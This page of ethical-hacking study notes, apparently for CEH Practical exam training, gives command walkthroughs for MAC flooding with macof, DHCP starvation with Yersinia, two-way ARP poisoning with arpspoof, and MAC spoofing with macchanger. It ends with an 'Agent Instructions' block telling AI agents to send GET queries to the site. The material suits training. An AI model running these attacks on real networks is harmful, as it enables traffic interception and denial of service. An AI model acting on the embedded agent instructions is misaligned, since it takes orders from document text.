# 1. Perform Active Sniffing

## 1. Perform mac flooding using macof

MAC flooding is a technique used to compromise the security of network switches that connect network segments or network devices. Attackers use the MAC flooding technique to force a switch to act as a hub, so they can easily sniff the traffic.

```
sudo macof -i ens33 -n 10
```

{% hint style="info" %}
-i interface

-n number of packets to send
{% endhint %}

<figure><img src="/files/7ci7xDPK1zdhsAthJqV8" alt=""><figcaption></figcaption></figure>

targeting an  IP address

```
sudo macof -i ens33 -d 192.168.18.1
```

## 2. Perform a DHCP Starvation Attack using Yersinia

In a DHCP starvation attack, an attacker floods the DHCP server by sending a large number of DHCP requests and uses all available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a Denial-of-Service (DoS) attack.

Start the Yersinia in an interactive mode.

```
sudo yersinia -I
```

press h for help, q to exit help

F2 to open DHCP attack mode. DHCP fields will be shown in the bottom

<figure><img src="/files/5FVMXxuG552BK2pjwUCa" alt=""><figcaption></figcaption></figure>

press x to list attack options and the type 1 to conduct DHCP starvation attack.

<figure><img src="/files/n5aO5FntlwmMHfUfKTtR" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">3. Perform Arp poisoning using arpspoof</mark>

Use the following command&#x20;

```
arpspoof -i eth0 -t 192.168.18.1 192.168.18.14
```

{% hint style="info" %}
192.168.18.14 is the target IP
{% endhint %}

Now poison the other machine

```
arpspoof -i eth0 -t 192.168.18.14 192.168.18.1
```

## <mark style="color:red;">4. Man in the Middle attack using cain and able</mark>

<figure><img src="/files/CqNr1F9UIxek9FnLUjBh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/RUjO30qR5ej1ByomUnDT" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">5. Spoof mac with TMAC and SMAC</mark>

<https://technitium.com/tmac/>

<https://smac-tool.com/>&#x20;

## <mark style="color:red;">6. Spoof Linux mac using macchanger</mark>

```
ifconfig eth0 down
Macchanger –r eth0
Ifconfig eth0 up
```

To view the mac address

```
macchanger -s eth0
```

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-8.-sniffing/1.-perform-active-sniffing.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.